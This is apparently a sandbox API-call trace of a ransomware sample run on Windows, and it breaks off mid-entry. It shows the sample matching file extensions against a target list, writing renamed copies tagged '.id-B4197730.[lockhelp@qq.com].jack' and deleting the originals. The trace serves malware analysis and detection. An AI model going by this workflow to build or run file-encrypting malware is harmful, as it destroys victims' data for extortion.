lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString=".docx") returned 5 [0199.367] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0199.367] lstrlenW (lpString=".pdf") returned 4 [0199.367] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString=".xls") returned 4 [0199.367] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString=".xlsx") returned 5 [0199.367] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0199.367] lstrlenW (lpString=".ppt") returned 4 [0199.367] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.367] lstrlenW (lpString=".zip") returned 4 [0199.367] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.367] lstrlenW (lpString=".rar") returned 4 [0199.367] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString=".bz2") returned 4 [0199.367] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.367] lstrlenW (lpString=".7z") returned 3 [0199.367] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.367] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.367] lstrlenW (lpString=".dbf") returned 4 [0199.367] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.368] lstrlenW (lpString=".1cd") returned 4 [0199.368] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.368] lstrlenW (lpString=".jpg") returned 4 [0199.368] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.368] lstrlenW (lpString=".doc") returned 4 [0199.368] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString=".docx") returned 5 [0199.368] lstrcmpiW (lpString1=".docx", lpString2="l.xml") returned -1 [0199.368] lstrlenW (lpString=".pdf") returned 4 [0199.368] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString=".xls") returned 4 [0199.368] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString=".xlsx") returned 5 [0199.368] lstrcmpiW (lpString1=".xlsx", lpString2="l.xml") returned -1 [0199.368] lstrlenW (lpString=".ppt") returned 4 [0199.368] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.368] lstrlenW (lpString=".zip") returned 4 [0199.368] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.368] lstrlenW (lpString=".rar") returned 4 [0199.368] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.368] lstrlenW (lpString=".bz2") returned 4 [0199.368] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.369] lstrlenW (lpString=".7z") returned 3 [0199.369] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.369] lstrlenW (lpString=".dbf") returned 4 [0199.369] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.369] lstrlenW (lpString=".1cd") returned 4 [0199.369] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0199.369] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 82 [0199.369] lstrlenW (lpString=".jpg") returned 4 [0199.369] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0199.369] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0199.369] lstrlenW (lpString="ko-kr.xml") returned 9 [0199.369] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0199.370] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=15097) returned 1 [0199.370] CloseHandle (hObject=0x42c) returned 1 [0199.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml")) returned 0x20 [0199.370] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.370] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0199.370] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0199.371] lstrlenW (lpString=".doc") returned 4 [0199.371] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString=".docx") returned 5 [0199.371] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0199.371] lstrlenW (lpString=".pdf") returned 4 [0199.371] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString=".xls") returned 4 [0199.371] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString=".xlsx") returned 5 [0199.371] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0199.371] lstrlenW (lpString=".ppt") returned 4 [0199.371] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0199.371] lstrlenW (lpString=".zip") returned 4 [0199.371] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0199.371] lstrlenW (lpString=".rar") returned 4 [0199.371] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString=".bz2") returned 4 [0199.371] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0199.371] lstrlenW (lpString=".7z") returned 3 [0199.371] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0199.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 79 [0199.371] lstrlenW (lpString=".dbf") returned 4 [0199.371] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0199.443] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-b4197730.[lockhelp@qq.com].jack")) returned 0 [0199.570] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.570] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.570] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.573] GetLastError () returned 0x0 [0199.573] ReadFile (in: hFile=0x420, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x285, lpOverlapped=0x0) returned 1 [0199.574] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x290, lpOverlapped=0x0) returned 1 [0199.575] ReadFile (in: hFile=0x420, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0199.575] WriteFile (in: hFile=0x404, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xea, lpOverlapped=0x0) returned 1 [0199.576] SetEndOfFile (hFile=0x404) returned 1 [0199.576] CloseHandle (hObject=0x404) returned 1 [0199.577] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0199.577] SetEndOfFile (hFile=0x420) returned 1 [0199.578] CloseHandle (hObject=0x420) returned 1 [0199.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x26) returned 1 [0199.578] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini")) returned 1 [0199.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.579] lstrlenW (lpString=".doc") returned 4 [0199.579] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0199.579] lstrlenW (lpString=".docx") returned 5 [0199.579] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0199.579] lstrlenW (lpString=".pdf") returned 4 [0199.579] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0199.579] lstrlenW (lpString=".xls") returned 4 [0199.579] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0199.579] lstrlenW (lpString=".xlsx") returned 5 [0199.579] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0199.579] lstrlenW (lpString=".ppt") returned 4 [0199.579] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0199.579] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.579] lstrlenW (lpString=".zip") returned 4 [0199.579] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0199.579] lstrlenW (lpString=".rar") returned 4 [0199.579] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0199.580] lstrlenW (lpString=".bz2") returned 4 [0199.580] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0199.580] lstrlenW (lpString=".7z") returned 3 [0199.580] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString=".dbf") returned 4 [0199.580] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString=".1cd") returned 4 [0199.580] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString=".jpg") returned 4 [0199.580] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString=".doc") returned 4 [0199.580] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0199.580] lstrlenW (lpString=".docx") returned 5 [0199.580] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0199.580] lstrlenW (lpString=".pdf") returned 4 [0199.580] lstrcmpiW (lpString1=".pdf", lpString2=".ini") returned 1 [0199.580] lstrlenW (lpString=".xls") returned 4 [0199.580] lstrcmpiW (lpString1=".xls", lpString2=".ini") returned 1 [0199.580] lstrlenW (lpString=".xlsx") returned 5 [0199.580] lstrcmpiW (lpString1=".xlsx", lpString2="p.ini") returned -1 [0199.580] lstrlenW (lpString=".ppt") returned 4 [0199.580] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0199.580] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.580] lstrlenW (lpString=".zip") returned 4 [0199.581] lstrcmpiW (lpString1=".zip", lpString2=".ini") returned 1 [0199.581] lstrlenW (lpString=".rar") returned 4 [0199.581] lstrcmpiW (lpString1=".rar", lpString2=".ini") returned 1 [0199.581] lstrlenW (lpString=".bz2") returned 4 [0199.581] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0199.581] lstrlenW (lpString=".7z") returned 3 [0199.581] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0199.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.581] lstrlenW (lpString=".dbf") returned 4 [0199.581] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0199.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.581] lstrlenW (lpString=".1cd") returned 4 [0199.581] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0199.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini") returned 69 [0199.581] lstrlenW (lpString=".jpg") returned 4 [0199.581] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0199.581] lstrcmpiW (lpString1=".jpg", lpString2=".jack") returned 1 [0199.581] lstrlenW (lpString="GreenBubbles.jpg") returned 16 [0199.581] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.610] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=6406) returned 1 [0199.610] CloseHandle (hObject=0x404) returned 1 [0199.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg")) returned 0x20 [0199.610] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.610] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.610] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.610] lstrlenW (lpString=".doc") returned 4 [0199.611] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.611] lstrlenW (lpString=".docx") returned 5 [0199.611] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.611] lstrlenW (lpString=".pdf") returned 4 [0199.611] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.611] lstrlenW (lpString=".xls") returned 4 [0199.611] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.611] lstrlenW (lpString=".xlsx") returned 5 [0199.611] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.611] lstrlenW (lpString=".ppt") returned 4 [0199.611] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.611] lstrlenW (lpString=".zip") returned 4 [0199.611] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.611] lstrlenW (lpString=".rar") returned 4 [0199.611] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.611] lstrlenW (lpString=".bz2") returned 4 [0199.611] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.611] lstrlenW (lpString=".7z") returned 3 [0199.611] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.611] lstrlenW (lpString=".dbf") returned 4 [0199.611] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.611] lstrlenW (lpString=".1cd") returned 4 [0199.611] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.611] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.611] lstrlenW (lpString=".jpg") returned 4 [0199.611] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.612] lstrlenW (lpString=".doc") returned 4 [0199.612] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1 [0199.612] lstrlenW (lpString=".docx") returned 5 [0199.612] lstrcmpiW (lpString1=".docx", lpString2="s.jpg") returned -1 [0199.612] lstrlenW (lpString=".pdf") returned 4 [0199.612] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1 [0199.612] lstrlenW (lpString=".xls") returned 4 [0199.612] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1 [0199.612] lstrlenW (lpString=".xlsx") returned 5 [0199.612] lstrcmpiW (lpString1=".xlsx", lpString2="s.jpg") returned -1 [0199.612] lstrlenW (lpString=".ppt") returned 4 [0199.612] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1 [0199.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.612] lstrlenW (lpString=".zip") returned 4 [0199.612] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1 [0199.612] lstrlenW (lpString=".rar") returned 4 [0199.612] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1 [0199.612] lstrlenW (lpString=".bz2") returned 4 [0199.612] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1 [0199.612] lstrlenW (lpString=".7z") returned 3 [0199.612] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1 [0199.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.612] lstrlenW (lpString=".dbf") returned 4 [0199.612] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1 [0199.612] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.613] lstrlenW (lpString=".1cd") returned 4 [0199.613] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1 [0199.613] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\GreenBubbles.jpg") returned 74 [0199.613] lstrlenW (lpString=".jpg") returned 4 [0199.613] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0 [0199.613] lstrcmpiW (lpString1=".htm", lpString2=".jack") returned -1 [0199.613] lstrlenW (lpString="Orange Circles.htm") returned 18 [0199.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0199.614] GetFileSizeEx (in: hFile=0x404, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=237) returned 1 [0199.614] CloseHandle (hObject=0x404) returned 1 [0199.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm")) returned 0x20 [0199.615] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0199.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0199.615] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.616] lstrlenW (lpString=".doc") returned 4 [0199.616] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.616] lstrlenW (lpString=".docx") returned 5 [0199.616] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.616] lstrlenW (lpString=".pdf") returned 4 [0199.616] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.616] lstrlenW (lpString=".xls") returned 4 [0199.616] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.616] lstrlenW (lpString=".xlsx") returned 5 [0199.616] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.616] lstrlenW (lpString=".ppt") returned 4 [0199.616] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.616] lstrlenW (lpString=".zip") returned 4 [0199.616] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.616] lstrlenW (lpString=".rar") returned 4 [0199.616] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.616] lstrlenW (lpString=".bz2") returned 4 [0199.616] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.616] lstrlenW (lpString=".7z") returned 3 [0199.616] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString=".dbf") returned 4 [0199.617] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString=".1cd") returned 4 [0199.617] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString=".jpg") returned 4 [0199.617] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString=".doc") returned 4 [0199.617] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0199.617] lstrlenW (lpString=".docx") returned 5 [0199.617] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0199.617] lstrlenW (lpString=".pdf") returned 4 [0199.617] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0199.617] lstrlenW (lpString=".xls") returned 4 [0199.617] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0199.617] lstrlenW (lpString=".xlsx") returned 5 [0199.617] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0199.617] lstrlenW (lpString=".ppt") returned 4 [0199.617] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0199.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.617] lstrlenW (lpString=".zip") returned 4 [0199.617] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0199.617] lstrlenW (lpString=".rar") returned 4 [0199.617] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0199.618] lstrlenW (lpString=".bz2") returned 4 [0199.618] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0199.618] lstrlenW (lpString=".7z") returned 3 [0199.618] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0199.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.618] lstrlenW (lpString=".dbf") returned 4 [0199.618] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0199.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.618] lstrlenW (lpString=".1cd") returned 4 [0199.618] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0199.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 76 [0199.618] lstrlenW (lpString=".jpg") returned 4 [0199.618] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0199.618] lstrcmpiW (lpString1=".htm", lpString2=".jack") returned -1 [0199.618] lstrlenW (lpString="Roses.htm") returned 9 [0199.618] CreateFileW 